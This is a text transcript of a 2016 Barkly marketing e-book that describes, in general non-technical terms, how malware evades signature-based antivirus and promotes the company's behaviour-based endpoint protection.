how malware sneaks past antivirus
TRANSCRIPT
How Malware Sneaks Past Antivirus
TM
TM© 2016 Barkly Protects, Inc. All rights reserved
How Malware Sneaks Past Antivirus 2
You’re not alone. Nearly 9 in 10 security professionals are planning on either replacing or augmenting their antivirus solutions2. And until they do, they’re operating under the assumption that what they currently have isn’t enough. At any moment, criminals can bypass their security.
Spending on IT security continues to rise, with current estimates projecting it to reach $170 billion by 20201. Despite all that spending, malware continues to be a big problem. Whether your own budget is growing year-to-year or not, chances are you’re still looking for something that’s actually going to stop attacks and lower your risk.
1 Cybersecurity Market Report, Cybersecurity Ventures: http://cybersecurityventures.com/cybersecurity-market-report/
2 2016 Cyberthreat Defense Report, CyberEdge Group: https://www.invincea.com/2016/03/cyberedge-group-2016-cyberthreat-defense-report/
Why is it that attacks are still getting through defenses?
To answer that question you need to understand how today’s modern malware works. Let’s look at some of the ways it breaks into systems that are defended with antivirus, and the sneaky things it does once it’s there.
TM© 2016 Barkly Protects, Inc. All rights reserved
How Malware Sneaks Past Antivirus 4
It wears clever disguises.
Most antivirus solutions rely on signature-matching methods to identify malware. To avoid getting caught, hackers run malware through a cryptor or obfuscator that changesits signature. It’s like putting on a new outfit.
TM© 2016 Barkly Protects, Inc. All rights reserved
How Malware Sneaks Past Antivirus 5
It sneaks into Microsoft Office files as a macro.Microsoft Office macros are helpful for automating common tasks, but can also beused as a vehicle for hackers. If macrosare set to auto-execute, malicious macros can start downloading and executing additional malware as soon as you open the file.
filE hoME viEw
AfoNt (reg) 11
fx
1
2
3
4
5
6
7
8
A B C D E
iNsErt forMulAs
B U
TM© 2016 Barkly Protects, Inc. All rights reserved
How Malware Sneaks Past Antivirus 6
It hides inside your favorite programs.Malware likes to take advantage of popular programs, like browsers or readers, so it uses all of your access and resources to do its mischief without you noticing. It uses a technique called process injection to insert its code into a program that’s currently running, adding the functionality it needs to attack.
00101010000111010101110
001101010010010010001
1010010101000011100110
101001001001000101000
10100110100011101010100100
0101010000111010101
00110101001001001000
1010010101000011100110
101001001001000101000
101001101000111010101
0101010000111010101
001101010010010010
101001010100001110
101001001001000101
1010011010001110101
00101010000111010101
00110101001001001000
1010010101000011100110
101001001001000101000
101001101000111010101
00101010000111010101110
001101010010010010001
1010010101000011100110
101001001001000101000
10100110100011101010100100
0101010000111010101
00110101001001001000
1010010101000011100110
101001001001000101000
101001101000111010101
0101010000111010101
001101010010010010
101001010100001110
101001001001000101
1010011010001110101
00101010000111010101
00110101001001001000
1010010101000011100110
101001001001000101000
101001101000111010101
00101010000111010101001101010010010010001010010101000011100110101001001001000101000101001101000111010101
Once it’s there...
TM© 2016 Barkly Protects, Inc. All rights reserved
How Malware Sneaks Past Antivirus 8
It launches a coup for system admin privileges.Power-hungry malware attempts to gain administrator privilege on your system by dodging controls that exist to manage user access control and authorization in the kernel of the operating system.
AdMiNistrAtor
*********
X
TM© 2016 Barkly Protects, Inc. All rights reserved
How Malware Sneaks Past Antivirus 9
It uses handy tools to steal your passwords.Malware uses special tools, like keyloggers and credential stealers, to get the keys to systems you have access to. These tools enable hackers to steal your user passwords, leaving any system you log into vulnerable.
p@55W04D mRSN!ffl3sMyP3t$n@
**Ep@55W04DmRSN!ffl3sCraZee3C@tL@dY
TM© 2016 Barkly Protects, Inc. All rights reserved
How Malware Sneaks Past Antivirus 10
It looks around for unsuspecting files to invade.Some malware uses a file scan technique to look at every file on your hard drive tooverwrite as many files as it can with malicious executable components. When you open one of those programs, it executes the malicious code.
00101010000111010101110
001101010010010010001
1010010101000011100110
101001001001000101000
10100110100011101010100100
0101010000111010101
00110101001001001000
1010010101000011100110
101001001001000101000
101001101000111010101
0101010000111010101
001101010010010010
101001010100001110
101001001001000101
1010011010001110101
00101010000111010101
00110101001001001000
1010010101000011100110
101001001001000101000
101001101000111010101
00101010000111010101110
001101010010010010001
1010010101000011100110
101001001001000101000
10100110100011101010100100
0101010000111010101
00110101001001001000
1010010101000011100110
101001001001000101000
101001101000111010101
0101010000111010101
001101010010010010
101001010100001110
101001001001000101
1010011010001110101
00101010000111010101
00110101001001001000
1010010101000011100110
101001001001000101000
101001101000111010101 00101010000111010101110001101010010010010001101001010100001110011010100100100100010100010100110100011101010100100
0101010000111010101001101010010010010001010010101000011100110101001001001000101000101001101000111010101
0101010000111010101001101010010010010 101001010100001110 101001001001000101 1010011010001110101
00101010000111010101001101010010010010001010010101000011100110101001001001000101000101001101000111010101
00101010000111010101110001101010010010010001101001010100001110011010100100100100010100010100110100011101010100100 0101010000111010101
001101010010010010001010010101000011100110101001001001000101000101001101000111010101
0101010000111010101001101010010010010 101001010100001110 101001001001000101 1010011010001110101
00101010000111010101001101010010010010001010010101000011100110101001001001000101000101001101000111010101
BarklyTM sees all of these malicious maneuvers – and stops them automatically.
How does Barkly stop malware that gets past antivirus?By taking an entirely different approach to identifying malware. Instead of relying on signature-matching, Barkly watches system processes for signs of malicious activity, then it stops that activity before the malware can do any harm.
That means unlike antivirus solutions, which can be thrown off by new or disguised malware they don’t recognize, Barkly can even stop new, never-before-seen malware, simply by watching its behavior and stopping it when it tries to do something it shouldn’t.
See How Barkly Works
TM